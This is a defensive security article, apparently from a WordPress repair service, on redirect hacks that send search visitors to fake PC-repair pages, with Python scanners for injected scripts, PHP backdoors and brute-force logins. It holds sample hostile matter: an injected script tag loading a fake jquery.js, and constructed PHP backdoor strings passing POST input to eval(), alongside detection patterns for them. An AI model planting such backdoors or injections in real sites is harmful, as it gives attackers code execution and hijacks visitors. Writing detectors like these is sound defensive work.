Recently there has been an increasing number of cases in which sites are tampered with so that visitors who arrive via Google search are redirected to a fake Windows virus-removal or PC-repair page.
In this article we explain this type of attack and the countermeasures against it.

Case Study of Redirect Hack Tampering on a WordPress Site

The site shows the following symptoms.
Visitors who arrive from search results are forcibly redirected to a site other than the page they clicked on.
In some cases the destination is a page that urges the visitor to disinfect a Windows virus or repair their PC, sometimes playing audio without the visitor's consent.
The symptoms do not always appear; they may occur only on the first visit, or at random. Because the redirect is typically triggered by the search-engine referrer, opening the site directly by typing its URL may show nothing at all.

What kind of code is embedded in the site?

A recent pattern in redirect hacks is to load a malicious JS file into the site. The file runs when the page loads and, with some probability, redirects the visitor to another site.
As an example, the following code is inserted immediately after a link in the post. (The hacker searches the post content for a link and mechanically appends the malicious code after it. The file name imitates jQuery so that it looks legitimate at a glance.)

<script src="http://XXXX/jquery.js"></script>

If your site redirects visitors who come from search results, check the affected posts for embedded script tags that load files from domains you do not recognize.
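One way to run that check over post content, as an added example that is not part of the original article or of any WordPress Doctor tool: the script below takes rows of post HTML (constructed samples here, standing in for the post_content column of wp_posts), finds every script tag whose src points at a host other than the site itself or an explicitly allowed third party, and records whether the tag sits directly after a link, the injection pattern described above. The site host, the allowed analytics host and the attacker.invalid domain are assumptions for the example.

```python
import re
from urllib.parse import urlparse

# Matches <script ... src="..."> with a double-, single- or un-quoted src value.
# The lookbehind keeps attributes such as data-src from matching.
SCRIPT_SRC_RE = re.compile(
    r'<script\b[^>]*?(?<![\w-])src\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE
)


def script_host(src):
    """Host part of a script URL; '' for same-site relative paths.

    urlparse handles absolute (http://h/x) and protocol-relative (//h/x) forms.
    """
    return urlparse(src).netloc.lower()


def find_injected_scripts(post_content, site_host, allowed_hosts=()):
    """Return external <script src=...> tags found in one post's HTML.

    A tag is reported when its host is neither the site itself nor one of
    allowed_hosts (known, legitimate third parties such as an analytics CDN).
    after_link records whether the tag follows </a> directly.
    """
    ok_hosts = {site_host.lower(), *[h.lower() for h in allowed_hosts]}
    findings = []
    for m in SCRIPT_SRC_RE.finditer(post_content):
        src = m.group(1)
        host = script_host(src)
        if host == "" or host in ok_hosts:
            continue  # relative path or trusted host
        preceding = post_content[: m.start()].rstrip()
        findings.append({
            "src": src,
            "host": host,
            "after_link": preceding.lower().endswith("</a>"),
        })
    return findings


def scan_posts(posts, site_host, allowed_hosts=()):
    """posts: iterable of (post_id, post_content). Returns {post_id: findings}."""
    report = {}
    for post_id, content in posts:
        hits = find_injected_scripts(content, site_host, allowed_hosts)
        if hits:
            report[post_id] = hits
    return report


# Constructed sample rows standing in for wp_posts.post_content (example data).
SAMPLE_POSTS = [
    (101, '<p>See <a href="https://example.com/docs">the docs</a> for setup.</p>\n'
          '<script src="/wp-includes/js/jquery/jquery.min.js"></script>'),
    (102, '<p>Read <a href="https://example.com/guide">the guide</a>'
          '<script src="http://attacker.invalid/jquery.js"></script> first.</p>'),
    (103, "<p>Tracking:</p><script src='//attacker.invalid/jquery.js'></script>\n"
          '<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>'),
]

if __name__ == "__main__":
    report = scan_posts(SAMPLE_POSTS, "example.com",
                        allowed_hosts=["www.googletagmanager.com"])
    for post_id, hits in report.items():
        for hit in hits:
            flag = " (directly after a link)" if hit["after_link"] else ""
            print(f"post {post_id}: external script {hit['src']}{flag}")
```

Posts 102 and 103 are reported; post 101 only loads a same-site file. Review every reported host by hand rather than deleting automatically: a tag loaded from a host you do not recognize is the injection, but a legitimate CDN you forgot to allow-list looks identical to the regex.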

It may also be the case that the theme's header.php or footer.php has been tampered with so that the malicious JS is loaded on every page.
Example of header file tampering

The above is an example of malicious code that has been obfuscated (made hard for a person to read) and written into the theme's header.php, which is loaded on every page.

How do hackers tamper with sites?

How do hackers perform such tampering? The most common way is to take over an administrator account and then edit files from the admin screen. Once they have administrator privileges, they can alter theme and plug-in files from the admin screen and embed malicious code, called a backdoor, that lets them alter the site again easily in the future.

Example of backdoor code

The above code uses obfuscated references to $_POST and $_GET to receive input from a browser, and eval(), which executes that input as PHP code, so the attacker can run any command on the server simply by sending a request.
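The two tampering patterns above (an obfuscated loader in header.php and an eval-based backdoor) share the same indicators: request input flowing into eval(), decoding functions such as base64_decode() or gzinflate() wrapped around eval(), and long base64 blobs. The scanner below, an added example and not code from the article or from WordPress Doctor's plugin, scores PHP sources on those indicators and reports files at or above an alert threshold. The sample files, the indicator weights and the threshold are this example's own assumptions; the samples are constructed for the example, not real malware.

```python
import os
import re
import sys

# Each indicator: (name, regex, weight).  Weights are this example's own choice:
# browser input fed into eval() is almost never legitimate, while base64_decode()
# on its own appears in harmless plug-in code (settings, inline images).
INDICATORS = [
    ("eval_of_request_input",
     re.compile(r'\beval\s*\(.*?\$_(?:POST|GET|REQUEST|COOKIE)\b', re.S), 5),
    ("eval_of_decoded_string",
     re.compile(r'\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(', re.S), 4),
    ("dynamic_call_of_request_input",
     re.compile(r'\b(?:assert|create_function)\s*\(.*?\$_(?:POST|GET|REQUEST)\b', re.S), 4),
    ("request_input_used", re.compile(r'\$_(?:POST|GET|REQUEST|COOKIE)\s*\['), 1),
    ("decoding_function", re.compile(r'\b(?:base64_decode|gzinflate|str_rot13)\s*\('), 1),
    ("long_base64_blob", re.compile(r'[A-Za-z0-9+/]{200,}={0,2}'), 2),
]
ALERT_SCORE = 4  # assumed threshold: one strong indicator, or several weak ones


def score_php(source):
    """Return (score, [matched indicator names]) for one PHP file's contents."""
    score, reasons = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(source):
            score += weight
            reasons.append(name)
    return score, reasons


def scan_files(files):
    """files: {path: source}. Returns [(path, score, reasons)] for files at or
    above ALERT_SCORE, highest score first."""
    hits = []
    for path, source in files.items():
        score, reasons = score_php(source)
        if score >= ALERT_SCORE:
            hits.append((path, score, reasons))
    return sorted(hits, key=lambda h: h[1], reverse=True)


def scan_directory(root):
    """Read every .php file (and .php.bak-style leftovers) under root and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php") or ".php." in name:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    files[path] = f.read()
    return scan_files(files)


# Constructed sample files for the example (not real malware).
SAMPLE_FILES = {
    # A normal theme header: nothing suspicious.
    "wp-content/themes/site/header.php":
        "<?php ?><!DOCTYPE html><html <?php language_attributes(); ?>>\n"
        "<head><?php wp_head(); ?></head><body <?php body_class(); ?>>",
    # Legitimate plug-in code that decodes a stored setting: one weak indicator only.
    "wp-content/plugins/widget/options.php":
        "<?php $opts = json_decode(base64_decode(get_option('widget_opts')), true);",
    # Minimal backdoor: browser input decoded and passed straight to eval().
    "wp-content/uploads/2023/10/cache.php":
        "<?php if(isset($_POST['p'])){eval(gzinflate(base64_decode($_POST['p'])));}",
    # Obfuscated loader: a long base64 string decoded and executed, the shape of
    # the tampered header.php described in the article.
    "wp-content/themes/site/header.php.bak":
        '<?php $c="' + "QUFB" * 60 + '";eval(base64_decode($c)); ?>',
}

if __name__ == "__main__":
    hits = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_files(SAMPLE_FILES)
    for path, score, reasons in hits:
        print(f"{score:3d}  {path}  ({', '.join(reasons)})")
```

Run with a path argument to scan a real installation (wp-content is the usual place, but a backdoor can sit anywhere the web server can reach, including uploads). The score is a triage aid: read every flagged file before deleting it, and remember that a file with no indicators is not proof of a clean site, since a backdoor can also be split across several files or hidden in the database.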

Two main methods are used to take over administrator privileges.

(1) Exploiting a vulnerability in WordPress itself or in a plug-in to obtain administrator privileges.
(2) Guessing the password by running the login form tens of thousands of times with automated software (a brute-force attack), then logging in as the administrator.

Against (1), keeping WordPress and plug-ins up to date closes the known vulnerabilities. Against (2), use a “login lockdown” function that blocks login for several minutes after a certain number of failed attempts, change the URL of the login page, and set a password of at least 12 single-byte (ASCII) letters, digits and symbols. Note that a lockdown keyed to the source IP address only slows down attackers who use a single address, and a changed login URL only hides the form from untargeted bots; the strong password is the control that actually matters.
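To tell whether method (2) has been tried against your site, the web server access log is enough: every guess is a POST to the login page. The script below, an added example that is not part of the original article, parses combined-format log lines (constructed samples here) and reports source addresses that produced at least a lockdown plugin's worth of failed logins inside a short window, plus whether the same address then logged in successfully, which is the case that calls for an immediate password reset. The threshold of 5 failures in 5 minutes, the sample addresses and the assumption that a failed WordPress login answers with status 200 (the form is re-rendered) while a successful one answers with a 302 redirect to the dashboard are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format:
# ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?")[0],  # drop query string
        "status": int(m.group("status")),
    }


def analyse(lines, max_failures=5, window_seconds=300, login_path="/wp-login.php"):
    """Return {ip: {"failures": peak, "then_succeeded": bool}} for addresses whose
    failed logins in any window of window_seconds reached max_failures.

    login_path lets the check follow a renamed login URL.  Heuristic: a POST to
    the login page with status 200 is a failed login, a 302 is a success.
    """
    failures, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        if rec["status"] == 200:
            failures[rec["ip"]].append(rec["time"])
        elif rec["status"] == 302:
            successes[rec["ip"]].append(rec["time"])

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= max_failures:
            flagged[ip] = {
                "failures": peak,
                "then_succeeded": any(s > times[0] for s in successes[ip]),
            }
    return flagged


# Constructed sample log (addresses from the RFC 5737 documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:03 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:05 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:07 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:11 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:13 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:14:02:40 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:14:02:58 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:09:10:00 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:11:40:00 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:15:20:00 +0000] "POST /wp-login.php HTTP/1.1" 200 2456 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:15:20:30 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG.splitlines()).items():
        tail = "  ** later logged in: reset the password **" if info["then_succeeded"] else ""
        print(f"{ip}: {info['failures']} failed logins in one window{tail}")
```

Only 203.0.113.7 is reported: the user at 198.51.100.23 mistyped once and then signed in, and 192.0.2.5 spreads three failures over hours, which no lockdown would trip. The 200/302 heuristic breaks if a plugin changes the login page's responses, and a brute force spread across many addresses shows up as a site-wide rise in login POSTs rather than as one noisy IP, which is exactly why the password itself has to be strong.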

Special Cases of Redirect Hacks

There are also cases where a site redirects visitors even though WordPress and its official plug-ins have not been tampered with. The following are actual cases.

(1) A plug-in distributed on the official site contained malicious code.
Reference article: The case of the suspension of the Display Widgets plugin containing malware and how to deal with it
(2) Advertisements served on the site by a third-party ad provider redirected visitors. (We will not reveal the name of the company, but when we inquired, they replied that they were reviewing their advertisements because of a number of similar cases.)
(3) The computer or smartphone viewing the site is itself infected with malware, so the redirect happens on every site the visitor opens, not only yours.
Reference article (Norton): How to eliminate browser hijacker malware

What to do if you have already been hacked

Please note that if the site has already been hacked, updating WordPress itself or the plug-ins will not remove the backdoor, other tampered files, or the code embedded in posts. An update only replaces the official files; comparing core files against the official checksums (for example with the WP-CLI command wp core verify-checksums) shows which core files were modified, but says nothing about the theme files, uploads and post content where the injections described in this article live.
Also, once an administrator account has been taken over, the hacker can re-enter through the backdoor even after the password is changed, so the backdoor itself has to be found and removed.

At WordPress Doctor, we have experience in recovering from hundreds of tampering incidents and have the know-how to take security measures that prevent further tampering.
We thoroughly remove tampered files and backdoors using our database of known tampered files, and install security measures on your site to make it difficult for hackers to compromise it again in the future.

Free site tampering code scanning and detection – WordPress Doctor: Malware Scanning Plugin